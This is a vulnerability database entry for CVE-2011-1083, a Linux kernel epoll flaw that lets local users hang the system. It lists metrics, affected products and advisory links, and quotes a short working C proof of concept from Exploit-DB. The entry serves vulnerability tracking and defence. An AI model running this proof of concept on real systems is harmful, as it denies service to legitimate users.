CVE-2011-1083 : Detail

CVE-2011-1083

0.17%V4
Local
2011-04-02
23h00 +00:00
2018-01-05
17h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The epoll implementation in the Linux kernel 2.6.37.2 and earlier does not properly traverse a tree of epoll file descriptors, which allows local users to cause a denial of service (CPU consumption) via a crafted application that makes epoll_create and epoll_ctl system calls.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-400 Uncontrolled Resource Consumption
The product does not properly control the allocation and maintenance of a limited resource.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 35403

Publication date : 2011-03-01 23h00 +00:00
Author : Nelson Elhage
EDB Verified : Yes

/* source: https://www.securityfocus.com/bid/46630/info The Linux Kernel epoll Subsystem is prone to multiple local denial-of-service vulnerabilities. Successful exploits will allow attackers to cause the kernel to hang, denying service to legitimate users. */ #include <unistd.h> #include <sys/epoll.h> int main(void) { int e1, e2, p[2]; struct epoll_event evt = { .events = EPOLLIN }; e1 = epoll_create(1); e2 = epoll_create(2); pipe(p); epoll_ctl(e2, EPOLL_CTL_ADD, e1, &evt); epoll_ctl(e1, EPOLL_CTL_ADD, p[0], &evt); write(p[1], p, sizeof p); epoll_ctl(e1, EPOLL_CTL_ADD, e2, &evt); return 0; }

Products Mentioned

Configuraton 0

Linux>>Linux_kernel >> Version To (including) 2.6.37.2

Configuraton 0

Suse>>Linux_enterprise_desktop >> Version 11

Suse>>Linux_enterprise_desktop >> Version 11

Suse>>Linux_enterprise_server >> Version 11

Suse>>Linux_enterprise_server >> Version 11

Suse>>Linux_enterprise_server >> Version 11

Suse>>Linux_enterprise_server >> Version 11

Configuraton 0

Redhat>>Enterprise_linux_desktop >> Version 6.0

Redhat>>Enterprise_linux_server >> Version 6.0

Redhat>>Enterprise_linux_workstation >> Version 6.0

References

http://article.gmane.org/gmane.linux.kernel/1105888
Tags : mailing-list, x_refsource_MLIST
http://secunia.com/advisories/43522
Tags : third-party-advisory, x_refsource_SECUNIA
http://openwall.com/lists/oss-security/2011/03/02/2
Tags : mailing-list, x_refsource_MLIST
http://article.gmane.org/gmane.linux.kernel/1106686
Tags : mailing-list, x_refsource_MLIST
http://secunia.com/advisories/48898
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/48410
Tags : third-party-advisory, x_refsource_SECUNIA
http://article.gmane.org/gmane.linux.kernel/1105744
Tags : mailing-list, x_refsource_MLIST
http://secunia.com/advisories/48964
Tags : third-party-advisory, x_refsource_SECUNIA
http://openwall.com/lists/oss-security/2011/03/02/1
Tags : mailing-list, x_refsource_MLIST
http://secunia.com/advisories/48115
Tags : third-party-advisory, x_refsource_SECUNIA
http://rhn.redhat.com/errata/RHSA-2012-0862.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.osvdb.org/71265
Tags : vdb-entry, x_refsource_OSVDB